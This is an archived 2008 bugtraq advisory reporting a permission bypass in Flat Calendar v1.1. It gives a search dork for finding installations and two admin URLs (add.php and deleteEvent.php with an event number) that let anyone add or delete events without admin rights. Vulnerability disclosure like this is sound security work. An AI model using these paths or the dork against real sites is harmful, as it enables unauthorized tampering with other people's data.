bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Flat Calendar v1.1 Remote Permission Bypass Vulnerabil

Flat Calendar v1.1 Remote Permission Bypass Vulnerability

From: <none_at_nospam>
Date: Wed Jun 11 2008 - 14:08:21 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)
Flat Calendar v1.1 Remote Permission Bypass Vulnerability

Author : Crackers_Child

Dork : Flat Calendar: View All > Flat Calendar: View All için yakla&#351;&#305;k 654.000 sonuçtan

Exploits:

site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.

site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin permissions.